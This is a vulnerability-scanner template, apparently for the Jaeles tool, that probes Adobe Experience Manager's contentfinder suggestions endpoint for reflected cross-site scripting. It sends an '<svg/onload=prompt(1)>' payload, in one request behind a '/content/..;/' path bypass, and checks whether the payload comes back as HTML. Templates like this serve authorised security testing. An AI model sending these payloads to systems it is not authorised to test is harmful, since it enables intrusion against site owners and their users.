id: aem-wcm-xss
info:
  name: AEM WCM RXSS
  risk: Medium

params:
  - root: "{{.BaseURL}}"

requests:
  # just verify this wcm enable
  - method: GET
    redirect: false
    url: >-
      {{.root}}/bin/wcm/contentfinder/connector/suggestions.json/x.html?query_term=path%3a/&pre=a&post=x
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", '{"suggestions":') && !=  StringSearch("response", '"results":0}') && StringSearch("resHeaders", "text/html")

  - method: GET
    redirect: false
    url: >-
      {{.root}}/bin/wcm/contentfinder/connector/suggestions.json/j.html?query_term=path%3a/&pre=%3Csvg/onload=prompt(1)%3E&post=jjj
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "<svg/onload=prompt(1)>") && StringSearch("response", "suggestions") && StringSearch("resHeaders", "text/html")

  - method: GET
    redirect: false
    url: >-
      {{.root}}/bin/wcm/contentfinder/connector/suggestions.json/j.html?query_term=path%3a/&pre=%3Csvg/onload=prompt(1)%3E&post=jjj&debug=true
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "<svg/onload=prompt(1)>") && StringSearch("response", "suggestions") && StringSearch("resHeaders", "text/html")

  - method: GET
    redirect: false
    url: >-
      {{.root}}/content/..;/bin/wcm/contentfinder/connector/suggestions.json/j.html?query_term=path%3a/&pre=%3Csvg/onload=prompt(1)%3E&post=jjj&debug=true
    headers:
      - User-Agent: curl/123
      - Referer: '{{.BaseURL}}'
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "<svg/onload=prompt(1)>") && StringSearch("response", "suggestions") && StringSearch("resHeaders", "text/html")